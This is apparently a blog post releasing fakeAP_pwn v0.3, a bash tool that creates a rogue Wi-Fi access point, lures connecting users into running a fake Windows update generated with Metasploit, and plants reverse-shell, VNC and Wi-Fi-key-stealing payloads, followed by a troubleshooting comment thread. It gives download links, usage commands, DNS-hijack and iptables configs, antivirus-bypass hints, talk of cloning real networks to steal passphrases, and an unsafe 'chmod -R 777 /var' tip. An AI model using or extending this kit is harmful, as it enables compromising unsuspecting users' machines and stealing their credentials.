There are lots of moving parts in this, and a lot of different environments it has to work in.
It was made when BackTrack 4 was current; it hasn't been updated for BackTrack 5.
I'm going to re-do it all "soon", but not right now. For the people who are having trouble: I'm unable to give support at the moment due to lack of free time. You're on your own until fakeAP_pwn v0.4 is out.
Links
Watch video on-line: http://g0tmi1k.blip.tv/file/4079518
Download video: http://www.mediafire.com/?yo06t9yiyeq4fff
Download Script (fakeAP_pwn-v0.3.tar): http://www.mediafire.com/?hakic7kqk8b6e8c
Download Script (fakeAP_pwn.v0.3-127.tar.gz): http://www.mediafire.com/?j2hz9rce10zh1w3
What is this?
An update to fakeAP_pwn, a bash script that automates creating a "Fake Access Point" and "pwning" whoever connects to it.
How does it work?
> Creates an access point, then runs a DHCP server and a web server.
> Creates an exploit (the payload executable) via Metasploit.
> Waits for the target to connect, then to download and run the fake "update".
> Once the target is exploited, it automatically uploads a second-stage payload (SBD, VNC or WKV) through the Metasploit session.
> Depending on the mode, it grants the target internet access after infection.
> The attacker has the option to run a few "sniffing" programs to monitor what the target does on the access point.
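The three pieces of plumbing the list above relies on are a DHCP server that hands out addresses and points clients at the AP, a DNS server that answers every name with the AP's address so any URL the target opens lands on the "update" page, and iptables rules that differ between the captive "non" mode and the internet-granting "normal" mode. The bash below is an added example, not fakeAP_pwn's own code: the interface names at0 and eth0, the 10.0.0.0/24 range and the use of dnsmasq for DNS are assumptions, and the functions only print the configs and commands so they can be inspected before anything touches the system.

```shell
#!/bin/bash
# Added example for the fakeAP_pwn write-up; not the project's own code.
# Prints (does not apply) the DHCP, DNS and iptables config a fake AP needs.
# Assumptions: airbase-ng's tap interface is at0, the upstream interface
# with internet is eth0, the AP owns 10.0.0.1/24 and dnsmasq serves DNS.

AP_IF="${AP_IF:-at0}"                  # interface the targets associate to
NET_IF="${NET_IF:-eth0}"               # upstream interface used in "normal" mode
AP_IP="${AP_IP:-10.0.0.1}"             # AP, DNS and web server address
AP_NET="${AP_NET:-10.0.0.0}"           # network address of the AP subnet
AP_MASK="${AP_MASK:-255.255.255.0}"

# dhcpd.conf: lease 10.0.0.100-254 and make the AP both router and DNS.
dhcpd_conf() {
  cat <<EOF
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet ${AP_NET} netmask ${AP_MASK} {
  option routers ${AP_IP};
  option domain-name-servers ${AP_IP};
  option subnet-mask ${AP_MASK};
  range ${AP_NET%.*}.100 ${AP_NET%.*}.254;
}
EOF
}

# dnsmasq.conf: "address=/#/IP" resolves every name to the AP, so whatever
# URL the target opens ends up on the fake "update" page instead of
# "page not found". no-resolv/no-hosts stop real answers leaking through.
dnsmasq_conf() {
  cat <<EOF
interface=${AP_IF}
no-resolv
no-hosts
address=/#/${AP_IP}
EOF
}

# iptables_rules MODE: "non" keeps the target captive (port 80 is redirected
# to the local web server, nothing is forwarded); "normal" NATs the AP
# subnet out through NET_IF so the target gets internet after infection.
iptables_rules() {
  local mode="$1"
  echo "iptables -F"
  echo "iptables -t nat -F"
  echo "iptables -P FORWARD DROP"
  case "$mode" in
    non)
      echo "iptables -t nat -A PREROUTING -i ${AP_IF} -p tcp --dport 80 -j REDIRECT --to-port 80"
      ;;
    normal)
      echo "echo 1 > /proc/sys/net/ipv4/ip_forward"
      echo "iptables -t nat -A POSTROUTING -o ${NET_IF} -j MASQUERADE"
      echo "iptables -A FORWARD -i ${AP_IF} -o ${NET_IF} -j ACCEPT"
      echo "iptables -A FORWARD -i ${NET_IF} -o ${AP_IF} -m state --state ESTABLISHED,RELATED -j ACCEPT"
      ;;
    *)
      echo "unknown mode: $mode (use non or normal)" >&2
      return 1
      ;;
  esac
}

# Run directly: dump all three for the mode given as the first argument.
dhcpd_conf
echo
dnsmasq_conf
echo
iptables_rules "${1:-non}"
```

Write the dhcpd_conf output to dhcpd's config file, the dnsmasq_conf output to dnsmasq.conf, and pipe iptables_rules through a shell only as root. Two things worth checking before blaming the script: without the wildcard address= line every site except the AP's own IP gives "page not found", and dhcpd3 needs its pid directory (/var/run/dhcpd on Debian-derived systems) to exist and be writable by the dhcpd user, so create that one directory rather than loosening permissions on all of /var.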
What do I need?
> The tar file, fakeAP_pwn-v0.3.tar (1018.5KB, SHA1:7C8605F19210FEDC3219822D4D28CC7D1E4A4996)
> A wireless card that supports monitor mode (airbase-ng also needs packet injection to work)
> Optional: another interface (wired or wireless) with internet access
> aircrack-ng suite, dhcpd3, apache2, metasploit, dsniff suite, wget --- all already on BackTrack!
> Optional: Subversion, hostapd, macchanger, sbd, vnc, squid, mogrify, imsniff, driftnet, sslstrip, ettercap --- all of which can be installed by fakeAP_pwn
Whats new?
In short, a lot. (=
When comparing it to an older version, just about everything has changed, except for the original idea! See the changelog at the end for more details.
Whats in the tar file?
> fakeAP_pwn.sh --- Bash script
> www/index.php --- The page that the target is forced to see before they have access to the Internet.
> www/Linux.jpg, OSX.jpg, Windows.jpg, your operating system.jpg --- OS pictures
> www/tick.jpg, favicon.ico --- Other images
> www/sbd.exe --- SBD payload
> www/vnchooks.dll, winvnc.exe, vnc.reg --- VNC payloads
> www/wkv-x86.exe, wkv-x64.exe --- WKV payloads
How do I use it?
1.) Extract the tar file (tar xf fakeAP_pwn-v0.3.tar).
2.) Copy the "www" folder to /var/www/fakeAP_pwn (mkdir /var/www/fakeAP_pwn; cp www/* /var/www/fakeAP_pwn).
3.) Either edit fakeAP_pwn.sh or specify your interface(s)/mode/payload via the command line. (You can view your interfaces with ifconfig, and use kate to edit the script.)
4.) Wait for a connection...
5.) ...Game over. (=
Commands:
tar xf fakeAP_pwn-v0.3.tar
cd fakeAP_pwn
ls
mkdir /var/www/fakeAP_pwn
cp www/* /var/www/fakeAP_pwn
bash fakeAP_pwn.sh
clear
ifconfig
bash fakeAP_pwn.sh -?
bash fakeAP_pwn.sh -m non -p wkv -v
bash fakeAP_pwn.sh -m normal -V
bash fakeAP_pwn.sh -m flip -d
ls
kate fakeAP_pwn.log
Troubleshooting
- "Odd"/Hidden SSID
  - airbase-ng doesn't always work... Re-run the script
  - Try hostapd
- Can't connect
  - airbase-ng doesn't always work... Re-run the script
  - Try hostapd
  - Try using two WiFi cards, with Diagnostics mode enabled
  - Target is too close/far away
  - I've found "Windows 7" connects better/more often than "Windows XP"
- No IP address
  - Use the latest version of dhcp3-server
  - Re-run the script
- Slow
  - Don't run on, or target, a virtual machine
  - Try hostapd
  - Try using a different MTU value
  - Check your hardware (for example, 802.11n doesn't work too well)
- Bypassing "problem" programs
  - Anti-virus - As of 2010-09-02, you MAY be able to bypass some by uncommenting line 1397 --- BackTrack only.
  - Windows Firewall - I'm working on it for the next release (=
  - UAC - Not sure... )=
- ... still not working correctly?
  - Re-run with Diagnostics mode enabled (-d)
  - Make a note of the setup (hardware, versions etc.)
  - Get in touch!
- Big thanks to joker5bb for giving a helping hand with the coding
- Thanks to everyone testing out the beta releases/giving feedback
- Tested on BackTrack 4 R1. Works with Ubuntu 10.04 too!
- It's worth doing this "manually" (without the script) before using this, so you have an idea of what's happening, and why. The script is only meant to save time.
- I'm running BackTrack 4 R1 in a VM. The target is running Windows 7 Ultimate (fully up-to-date as of 2010-09-02), with the firewall enabled, no AV and UAC enabled (Windows 7 defaults). The other target is running in a VM using Windows XP SP3 Professional.
- All connections are reverse connections: the target connects back to the attacker, so the attacker is the server. That is why it can get past host firewalls, which usually allow outbound connections...
- As you can see in the code there is a "roadmap": one day I plan for this to also affect Linux and OSX, support multiple clients, have a different "delivery system" and a "Cloning" mode.
- The video doesn't demonstrate everything...
- The video uses fakeAP_pwn v0.3 #100
Song: Sigma - Paint It Black & The Prodigy - One Love & Zombie Nation - Kernkraft 400
Video length: 11:48
Capture length: 33:07
Blog Post: http://g0tmi1k.blogspot.com/2010/09/scriptvideo-fakeappwn-v03.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/32462-%5Bscript%5D-%5Bvideo%5D-fakeap_pwn-v0-3-a.html#post173954
~g0tmi1k
Changelog
2010-10-28 - v0.3 (Build 125)
> Added: IP info
> Added: Logging of IPTables
> Added: Port check & Kill apps
> Changed: "DHCP Server" (Using dhcpd3 again)
> Changed: "Temp" output folder
> Fixed: Display bug (when gateway was wrong)
> Fixed: Hostapd detecting bug
> Fixed: Install "apps" bug
> Fixed: IPTables - "Clear" bug
> Fixed: IPTables - "Force" bug
> Fixed: www/ folder copy bug
> Updated: "Help" screen (Removed unused commands)
> Updated: Internal working (Bug fixes, Renamed values, Uses less output windows, etc)
> Updated: Metasploit script
> Updated: Ping tests
> Updated: Screen outputs
2010-09-02 - v0.3 (Build 100)
> Added: 'Diagnostics' and 'Verbose' modes
> Added: 'HostAP' to create access point
> Added: 'Monitoring connections' feature
> Added: 'Normal' & 'Flip' (Upside-Down-Ternet) modes
> Added: 'Update' feature
> Added: 'WKV' payload
> Added: More 'checks' & 'Self fixes'
> Added: More programs to 'extra' features
> Changed: The DNS server
> Fixed: lots of bugs/errors
> Renamed and moved sections around
> Updated: 'index' & OS images
> Updated: 'metasploit', 'dhcpd3', 'apache' scripts
> Updated: 'sbd.exe' & 'vnc.exe' & 'vnc.reg'
> Updated: The 'help' screen
> Updated: All of the 'internal structure/workings'
> Updated: The command line arguments
> ...and a couple of extra 'little' things
great script and GREAT song choice! everything is great :D great you well can't say great thanks but he thnx ;)
@Nivong
Thanks for the kind words
Why is it 10.0.0.1? Isn't your gateway IP 192.168.0.1? Have you tested it on a box, or just a virtual machine?
I really can't configure the settings, please assist me.
Thank you
@mastahhh
Because it creates its own network, I chose to use 10.0.0.0/8 for the IPs.
My gateway is 192.168.1.1, but this doesn't matter as it automatically detects your gateway.
Yes, I've tested this on BackTrack & Ubuntu, both on a real and virtual machine, attacking both real & virtual machines too.
To configure the settings, either:
> edit the script (for example, using kate)
> use the command line options (see -?)
Both methods are in the video
Wow.. this is so great..
Thanks for sharing
I'm still waiting
for the next tutorial post :)..
"did You have a g0tmi1k"
Oh I see, hmm, yes it worked, but it's hidden, and sometimes it cannot connect. Like you listed in the troubleshooting.
Furthermore, I can say this exploit is very good.
Thank you..:)
Hi, I've got 2 wifi cards, and I have my interface set to wlan0
and wifiInterface to wlan1. When I run fakeAP_pwn.sh I need to start my network and WICD again to get it to work. Any way to fix this?
Nice work brother
What is drawing that new system info on the desktop with all the graphs?
@mastahhh
What OS are you targeting?
If you can, setup and use hostapd
@Sonej
I'll have a look into it, and have a fix out as soon as I can
@rodrigo
Thanks for the thanks
@Garethd
conky
Tried it on XP, Vista, and 7. Still hidden.. Yes, I tried hostapd, installed properly, but in the end I can't get it working. So my only option is using airbase-ng and I'm facing many problems; also tried 2 wireless cards, wlan0 and wlan1. Still hidden, and unable to connect..
Any suggestions?
@mastahhh
You could try and spend more time to get hostapd working?
Which two wifi cards did you try? (not the interface names, but the make/model?)
Have you tried to edit line 1412, and remove "-W 0"?
What command lines are you using?
Try it once again, but this time with "-d", and post the output?
I have tried this one out but my test machine [victim] can't seem to connect.
@blackhatstuff,
Sorry, but how can you know it can't connect without trying it?!
Dude, thanks for responding. Yes, I really can't connect to [Free Wifi]. I don't know what I'm doing right now, but if you can share a good link on configuring "hostap" that would be great. Thanks master
@blackhatstuff
What version are you using?
Could you post the output of "-d"?
What is displayed on "Access Point" window (top left window)? Does it say anyone has connected?
You can install hostapd in the latest version of the script. Else look on the thread (link is in the post), and Joker has posted a guide on how to install it manually.
The normal and flip modes aren't working for me; it always uses the SBD payload method instead. I've tried setting both on the CLI and editing the script.
ReplyDelete@WSWFu
What version are you running?
If you haven't, try and update it. bash fakeAP_pwn.sh -u
fakeAP_pwn v0.3 #125
Download: http://www.mediafire.com/?r8636m3cd8lmkdg
Added: IP info
Added: Logging of IPTables
Added: Port check & Kill apps
Changed: "DHCP Server" (Using dhcpd3 again)
Changed: "Temp" output folder
Fixed: Display bug (when gateway was wrong)
Fixed: Hostapd detecting bug
Fixed: Install "apps" bug
Fixed: IPTables - "Clear" bug
Fixed: IPTables - "Force" bug
Fixed: www/ folder copy bug
Updated: "Help" screen (Removed unused commands)
Updated: Internal working (Bug fixes, Renamed values, Uses less output windows, etc)
Updated: Metasploit script
Updated: Ping tests
Updated: Screen outputs
It's worth re-downloading the tar.gz instead of using "-u".
fakeAP_pwn v0.3 #126
Fixed: ESSID bug
Fixed: Route bug
Fixed: SSLStrip bug
Removed: "Extras" --- Needs more testing, will be added back in later
http://code.google.com/p/fakeap-pwn/source/detail?r=126
http://www.mediafire.com/?8t88l8il0gedh8g
Hi, firstly I'd like to thank you for your great work, and I think that you do not have much time for your projects, but I would like to ask once to add the option to edit your own fake site. I have tried with htm and php; only the backdoor I set did not link directly to the site to open.
Thank you again, good luck :)
Again nice update, will check it soon. Still I have a request: can there be an option to select that there is no backdoor if a client connects? (don't know if this is already there?) So we can use it as an access point? (handy for my mobile phone with less wifi range)
And keep up the good work!
@Nivong
Yes, it's already there.
"Normal" - Just does "wifi tethering". Doesn't force a backdoor. ;)
@andrew007
You can edit/replace "www/index.php" with your own site.
You need to have a link to the backdoor, "http://anything.you.like.com/Windows-KB183905-x86-ENU.exe"
e.g. Download
I want to have babys with you (LOL)
@Nivong
LOL.
(=
***fakeAP_pwn v0.3 #127***
Fixed: "Creating temp folder" bug
Fixed: "Debug output" bug
Fixed: "WiFi driver" bug
Fixed: "WiFi Key" bug
Updated: Internal working
Updated: "Update" function
http://code.google.com/p/fakeap-pwn/source/detail?r=127
Download: http://www.mediafire.com/?j2hz9rce10zh1w3
Should I overwrite the original file with the update or should I directly use the update file only?
And can't I change the ESSID "Free Wifi"?
And one more thing: the site that the victim sees, I think it should be more developed so that they cannot notice it is fake. It should be somewhat similar to the official site of Microsoft.
And one more thing. I really admire your work.
I thought something like this was just imagination. But you proved it real. Great job
@Sorup
You should ALWAYS create a backup. Then I would overwrite it.
Test it, see if it works okay and you like the update. Then it's up to you if you keep the backup.
Yes, you can change the ESSID: if you open it up in a text editor, look for something like ESSID=Free-WiFi.
There has been an update to the webpage, I don't know if you have seen it.
I don't think I could copy/clone the official page due to copyright and other legal issues. )=
Yes, to make it look better (still), is on my to-do list, however it's right at the bottom.
And thanks for the thanks,
Any feedback (good or bad) on it would be great (=
Yeah, I have seen the new page in the updated version. But I think we should think and try something to tempt people. VNC can easily be detected in the background. Is there any alternative to it, to hide it? You also could include a WPA/WEP login page apart from WKV. It would seem more official
@Sorup
As I said, I don't want to clone someone else's due to copyright and other legal issues.
Plus I would rather spend my time trying to improve the code, add new features etc, rather than work on the fake page.
If you want to see an improvement on it you're more than welcome to do it yourself, and I would love to see what you have done to it.
About the VNC, where would you like it to be hidden from? I'm sure it's as easy to detect compared to SBD... (tbh, both are pretty easy to detect.)
With the login idea, the only issue is, if people connect randomly and are forced to see "login before you can use", they will just log off the wifi again, as they don't know what the login details are.
Oh, I'm sorry, but I just meant to say your script can be modified to clone the WPA access point nearby. The ESSID can be cloned and the victim who has access to the original access point will be tempted to connect to it and key in the WPA passphrase.
@Sorup
That's planned! (Cloning another AP nearby)
However - I haven't had the time to code it... And there are a couple of other things I want to see in fakeAP_pwn before cloning!
Keep up the good work. I want to see this to version 1 SET.
Another feature that would be really nice!
Instead of running apache and using the webpage you made, let it redirect to a special IP address. Like for example, if I use SET it makes a webpage (clones a page) and that would be better, looks more legit.
You understand me :P ?
@Sorup,
I haven't got much free time at the mo )=
and what free time I've got I'm trying to use to work on/complete a few more scripts/videos before I start work again on fakeAP_pwn.
@Nivong
Yes, I get you. (=
Nice idea. I'll keep it in mind for v0.7 ('Cloning' stage!)
How do you run BackTrack? Because I've read a lot of things that VMware isn't working well?
@Nivong
I've got:
> BackTrack 4 R1 on an old desktop that lives under my desk, which is what I usually use.
> BackTrack 4 *something* on a USB stick too. I only use it when I'm travelling/on holiday.
Yes, some things have "issues" when run in a VM. Airbase-ng is one of these. Personally I've found that airbase-ng is A LOT more stable when I use it on a "real" PC, instead of a VM. Hostapd seems 'okay' when used in "real" or VM.
Great work and Great Tut
Thanks for your useful videos
Can you please add a video showing how you can hack online clients
like online game clients
Can I show the victim's saved wireless password? Or upload another injection like a trojan or a program which shows the wireless password??
@tah
Thanks for the thanks.
I'll take your idea in consideration when I start recording videos again.
@marti
Yes. fakeAP_Pwn can do this already.
Try: WKV mode. (=
It uses a program (WirelessKeyView) to do it.
Hi, I'm giving a try to your FakeAP_pwn running on BT4R1, with the victim being a WinXP SP3.
The victim connects very easily to the FakeAP but the fake page is never shown: when from Internet Explorer I try to open any web page I'm not shown the fake page but instead the error message PAGE NOT FOUND.
I'm running NON-TRANSPARENT MODE.
Thanks,
Alessandro
Did you copy the www files, Alessandro?
@g0tm1lk
I found a (bug) problem in the script.
I am on a hotspot (using a login pass) and after logging in I have internet. But fakeAP_pwn doesn't say I have internet, so it switches to non. NOW the problem is I HAVE internet (I can view youtube, gmail etc.). I redownloaded the script. Isn't working.
My setup:
2 wifi cards
1=wifi0 (internet connection)
2=wifi1 (no internet connection, want to use for fakeap)
So any chance you can fix this?
NVM, got that working. Now I have a problem:
/root/fakeAP_pwn/fakeAP_pwn.sh: line 556: [: too many arguments
I enabled extras to true
So that's bug 1. Now on my iPad I can't receive an IP and also not on my mobile (Windows based) device (HD2), but I can receive it on XP, wtf :P?
Yes, www files have been copied.
To add to my previous comment, I have seen that the fake page appears on the victim PC only when in IE I ask for the URL http://10.0.0.1
Instead for all other URLs (for example www.facebook.com) I receive PAGE NOT FOUND.
Alessandro.
Where can I download the 0.2.5 version??
v0.2.5 is much better than v0.3
I don't like VNC in version 0.3
The victim must click twice to run the exploit in version 0.3; in version 0.2.5 the victim must click once to run the exploit.
http://g0tmi1k.blip.tv/file/3622180
is much better but there is no link to download anymore
Absolutely beautiful piece of architecture...
@Alessandro
I'm going to need a lot more information to help you.
What version are you running of fakeAP_pwn?
What is the output (please could you run it with -v)? Could you share the log file?
How are you running it? VM, USB, DVD, HDD?
Does the target get an IP address?
What is shown on the attackers screen?
@Nivong
Thanks for helping out
What version of fakeAP_pwn are you using?
I've made a note of it - and I'll look at it when I next can!
@Nivong
What did you do to fix it?
Extras hasn't been tested too well - it causes a lot of issues.
I've also made a note of it!
About the IP issues - does anything show in the DHCP window? What about the fakeAP window?
What is your setup? Can you share the log file or the output when using -v?
@Alessandro
Okay - so it sounds like a DNS issue - it's not redirecting sites to 10.0.0.1. A few people have reported this. Personally, I don't have any issues in my lab, so it's hard for me to find a fix for it. I'm working on something though!
@jan
What do you mean by "click twice?"
As soon as the target runs VNC - it then infects them!
It then gives them a fake warning message about running it - it doesn't matter what they click as they are already infected!
The reason why this was added, the target was waiting too long for feedback, and wouldn't know if what they have done, has "updated" their system.
Was this the only reason why you don't like v0.3?
I've archived v0.2.5.
Download link: http://www.mediafire.com/?iq5o4u6xora2p21
@Cold Element
Thanks for the thanks! (=
Glad to know someone likes it! =D
I used the latest version.
I also figured out that I &&@*$ up my BackTrack DHCP server. Will reinstall this today, and try it again.
Btw, in the DHCP window nothing happened....
Oh and what I did to fix it: I restarted BackTrack and then it did run :P
Btw my setup:
Wlan0 = Intel 5100 (inside of the laptop)
Wlan1 = Edimax RT73 Turbo (thing) (external)
BackTrack installed on the main HDD (dual boot with my Windows 7 installation)
@Nivong
Are you using airbase-ng? Have you tried hostapd?
Yes, I use airbase; hostapd isn't compatible with my wlan....
ReplyDelete@ G0tm1lk
ReplyDelete---------
Sorry for my late answer, but I was out of my town.
I'm trying to answer your questions creating one post for each question.
Q: What version are you running of fakeAP_pwn?
A: 03-127
Q: Could you share the log file?
A: See "fakeAP_pwn.log" available at
https://docs.google.com/leaf?id=0B2Ryu437Ip17ODViYmIzYmYtOTI2Yi00M2Y4LTg3YzItZTI0NGE3MzdmZTc2&hl=it
Q: How are you running it? VM, USB, DVD, HDD?
A: DVD live with BT4R1 (If you prefer I could download and try R2)
Very important: given that I'm using a live distribution, I don't want to download
and install DNSMASQ every time, so I have downloaded the two .DEB files and every time I install DNSMASQ with:
dpkg -i dnsmasq-base_2.45-1ubuntu1.1_i386.deb
dpkg -i dnsmasq_2.45-1ubuntu1.1_all.deb
Could this be the cause of the problem?
Q: Does the target get a IP address?
A: IPCONFIG shows
IP ADDRESS=10.0.0.150
Subnet mask=255.255.255.0
Dft Gateway=10.0.0.1
Q: What is shown on the attackers screen?
A: See "snapshot1.png" available at
https://docs.google.com/leaf?id=0B2Ryu437Ip17MWUwN2UzMWQtMDgyNS00MGY1LWI5NzMtM2ZiMzY3ZDk2ZDE5&hl=it
A last thing, for further communications it would be better to use PM at BackTrack Forums. My user account is JackBauer.
Still another thing: at this link you can find the fakeAP_pwn.sh script I'm using. It is the standard version in which I just changed some of the default values: https://docs.google.com/leaf?id=0B2Ryu437Ip17MThjMTFjZjktZTJjNC00NjQ3LTlkYjMtZmRjYjczNDU2MzRi&hl=it
In this way you should be able to reproduce the exact situation.
@Nivong
How are you running it? VM, USB, HDD?
VM has known issues, and it's been reported that it doesn't behave well when run from a USB BT.
It's best to try it from a real HDD setup.
What WiFi card have you got? What drivers is it using?
@Alessandro
Also sorry for my late reply.
However I'm going to reply in just one post ;)
About the log file - it seems to be missing the last half of it (however, I don't think it's needed)
It looks like you're having a DNS issue (which seems to happen for a couple of people).
Personally I don't have this issue, so it's hard for me to replicate, which makes it harder to find a solution...
However, Joker a while back said he believes he found the problem and is working on a solution.
It's known that it has issues when fakeAP_pwn is run in a VM, and it's been reported that it doesn't work well with "live" setups. If you can, it's worth doing a real install onto your HDD.
However, as you have managed to get that far - it's a good sign. Could you confirm your WiFi card and driver? Looking at the log file, it's saying it's using "iwlagn", which I guess is for "Intel Corporation PRO/Wireless 4965". However, you told it to use "wlan1" (in-built ones are usually wlan0), so am I right in thinking it's "rtl8187"? But what's the card? I didn't have much joy when I used my internal WiFi card, "Intel 5100 ~ iwlagn".
I haven't been able to work on this for a while, however I do plan to start work on it around March time. (I will have more free time then).
I'll track you down and send you a PM after I've sent this out.
Hey g0tmilk,
I'm a skiddie. Your BT4 VMware video was really helpful. But BT isn't able to detect my Intel 5100 wifi... Any workaround? Also heard the 5100 doesn't support packet injection, true? I'd be really thankful if you could help me with the 5100 patch and I'm sure there are others with 5100s.
Thanks mate.
My card
wlan0 ralink 2573 usb
wlan1 intel 4965
I edited fakeap_pwn.sh
interface=wlan0
wifiinterface=wlan1
I run the command bash fakeap_pwn.sh
internet access: failed
dnsmasq isn't installed
and I type y and enter
failed to install dnsmasq
Can you help me
[quote]
g0tmi1k said...
@mastahhh
Because it creates its own network, I choose to use 10.0.0.0/8 for the IP's to use.
My gateway is 192.168.1.1, but this doesn't matter as it automatically detects your gateway.
[/quote]
That's wrong. It doesn't. My router works on 10.0.0.1 and I am absolutely NOT able to tell fakeAP_pwn.sh that it has to use a different IP. In the variables I can define an IP for the AP, but that setting doesn't seem to work at all. It STILL uses 10.0.0.1 as LHOST, which can't work....
If I download ver. 127 of your script, it just goes till:
root@bt:~/fa# bash fakeAP_pwn.sh
[*] fakeAP_pwn v0.3 (#127)
[>] Analyzing: Environment
That's all, you can wait, but nothing is going to happen anymore. (BT4 RC2, newest updates etc.)
So 0.3 doesn't work with 10.0.0.1 as router and the
newer fakeAP version doesn't work at all, good job... really good job.
@Joe
You can only use USB WiFi cards inside a VM; if you wish to use your inbuilt one, you need to either use a CD, a USB stick, or install it to the HDD.
It sounds like the 5100 is supported in BackTrack 4, however it's not stable.
For a rough guide, try reading/following this:
http://www.backtrack-linux.org/forums/old-backtrack-4-non-working-hardware/19768-intel-5100-injection-problem.html#post142874
@dunglambay
It fails because you don't have an internet connection.
Make sure you can surf to google.com before running
*start-networking, dhclient [interface], firefox -> google.com*
@supreme
No, it IS true. It creates its own network!
Except you have the same IP addresses, which is why there is a problem (hence it fails to create its own network).
Currently it's not coded to support your setup. I've made a note of this, and will add something in for the next release.
@supreme (second post)
What happens when you run -v? -V? Or -d? Can you post the log files which are then created? This will show more information.
fakeAP_pwn doesn't support your setup; it was designed with class C networks in mind, 192.168.x.x. Maybe one day it will, however this was a project I set up in MY lab, and I'm just sharing it with the people that want it (and from the tone of your post, you don't). As most people use class C in their labs, this isn't usually a problem for them (wifi drivers/cards are the common issue).
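The collision described in this exchange, where the upstream router already sits on 10.0.0.1 and the script's fixed 10.0.0.1 LHOST then cannot work, can be avoided by looking at the upstream gateway before choosing the AP subnet. The following bash is an added example, not code from fakeAP_pwn: the candidate ranges, the use of "ip route" to find the default gateway, and the comparison on the first three octets are all assumptions.

```shell
#!/bin/bash
# Added example for the fakeAP_pwn thread; not the project's own code.
# Picks an AP subnet that does not clash with the upstream network the
# attacker is already on. Candidate ranges and the use of "ip route" to
# find the default gateway are assumptions.

# First three octets of a dotted-quad address ("10.0.0.1" -> "10.0.0").
prefix24() {
  echo "${1%.*}"
}

# Default gateway from the routing table; empty if there is none (no
# internet, so the script would be running in "non" mode anyway).
upstream_gateway() {
  ip route show default 2>/dev/null | awk '/^default/ { print $3; exit }'
}

# pick_ap_subnet GATEWAY_IP: print the first candidate /24 prefix whose first
# three octets differ from the gateway's. Returns 1 if every candidate clashes.
pick_ap_subnet() {
  local gw="$1" cand
  for cand in 10.0.0 172.16.0 192.168.77; do
    if [ -z "$gw" ] || [ "$cand" != "$(prefix24 "$gw")" ]; then
      echo "$cand"
      return 0
    fi
  done
  return 1
}

# ap_addresses GATEWAY_IP: print "AP_IP AP_NET AP_MASK", ready to feed the
# rest of a fake-AP script. Fails if no candidate is free.
ap_addresses() {
  local net
  net=$(pick_ap_subnet "$1") || return 1
  echo "${net}.1 ${net}.0 255.255.255.0"
}

# Run directly: show what would be chosen on this machine.
gw=$(upstream_gateway)
if addr=$(ap_addresses "$gw"); then
  echo "upstream gateway: ${gw:-none}; AP ip/net/mask: $addr"
else
  echo "no candidate subnet is free of the upstream network" >&2
fi
```

Run as a script it prints the gateway it found and the addresses it picked; pick_ap_subnet and ap_addresses can be dropped into a larger script in place of a hardcoded 10.0.0.1. It only compares the first three octets, so an upstream network with a shorter mask (say 10.0.0.0/8 on a corporate LAN) still overlaps the first candidate; compare against the upstream route's prefix length if that matters in your lab.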
I was successful
but the victim downloads WKV very slowly
How to change the MTU value?
@dunglambay
Right-click on the script, and look for the line "MTU=1500". Edit it to your own needs
How to hidden essid victim catch it connect me
My use laptop probe still found essid victim so victim can connect Access Point its
My Card wifi WUSB54GC Ver 3
My card wifi activities not far
What card wifi activities = Access Point and support Backtrack 4 RC2
@dunglambay
Sorry, I don't understand your comment. Could you re-word it?
HI All,
May I have some guidance on adding a WEP key to access my FakeAP?
Sorry, I use Google Translate
I can't fake AP victim, victim still see and connect
Dear g0tm1lk:
I can not run the script "(fakeAP_pwn.v0.3-127.tar.gz)" in Ubuntu Maverick 10.10; the dhcp3 server does not work. It displays an error: /var/run/dhcpd/dhcpd.pid not found. "dhcpd3 failed to start".
Please can you help me or someone from the blog.
Thank you very much
It could be an authorization problem.
Try giving full permissions to the var folder:
chmod -R 777 /var
Thank you very much JackBauer
That was the solution, now it loads fine. But there is a problem, I get an error. Error: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: the system cannot find the file specified.
What is this error?
THANKS
@maverickmk
It hasn't yet been coded into it - however you can do it yourself
#127, line 1368, add "-w [yourwepkey]"
and make sure you're using airbase-ng!
@dunglambay
I still don't understand.
You say "can't AP victim", however you then say you can "see and connect".
What issue are you having?
@Fran
It's only been tested fully with BackTrack; I've started work to support other OSes (such as Ubuntu, as BackTrack is based upon it)
How did you install dhcpd?
@JackBauer
Thanks for the helping hand ;)
@Fran
Glad to hear that error has been fixed.
It sounds like metasploit/meterpreter is looking for a file that doesn't exist.
As you said before, you're using Ubuntu. Now it could be because of permissions and the script is unable to write a file "somewhere".
Which screen is this shown in? What stage?
Could you try running the script again, and add either -V or -d at the end, and paste the output/debug file to pastebin.com?
Dear g0tm1lk:
My pastebin is: http://pastebin.com/8rfw6Cj9
http://pastebin.com/e4WprZss
Install dhcp:
apt-get -y install dhcp3-server ; update-rc.d -f dhcpd3 remove
Thanks for the feedback, however I'm stuck on version #101 as my setup doesn't seem to like #127 (similar problem to supreme, freezes at "[>] Analyzing: Environment"), but I'm using a class C setup.
Keep up the admired work!
Regards
Maverick
When the script is running i'm encountering this error:
"[!] Internet access: Failed"
"[i] Switching mode: non"
I've searched the script code and I've noticed that the script executes the command "wget -q -O - whatismyip.org" and if it fails it prints the above messages... I would like to ask if it's really a network error that prevents smooth script execution and how I could fix it (my default network interface is eth0 and my wired network interface is wlan0)...
Thanks in advance G0tmi1k!
Great work on the script. I still use Rev #101 all the time. Are you going to release any new revisions past Rev 127? Once again keep up the good work and I always look forward to your new vids.
Regards
DsGb
Great piece of work.. Could I add a WPA key to the fake wifi network so I can clone an existing wifi network?
Al_Capone said...
When the script is running I'm encountering this error:
"[!] Internet access: Failed"
"[i] Switching mode: non"
I've searched the script code and i've noticed that the script executes the command "wget -q -O - whatismyip.org"
I found the same problem. I did a little googling and found that the site "whatismyip.org" doesn't seem to exist. I DID, however, find whatsmyip.org. I replaced that part of the script and still have the same problem. Can't verify the connection. Tried uncommenting the ping line just after the wget command and commenting the wget but still no bueno.
Other than that it works fine for me. Great work g0tmi1k!
The script still isn't working completely as intended yet, but I have been able to find a couple of minor glitches/improvements. The 'wget -q -O - whatismyip.org' is very slow for me, so I found a .com site and it seems to work well enough that I don't time out every time I try to connect. No matter, I still can't figure out why the connected client can't access the internet. Was wondering if there was any other way (scripting-wise) to have the client use my internet connection for access?
How can I get the password of the victim's AP?
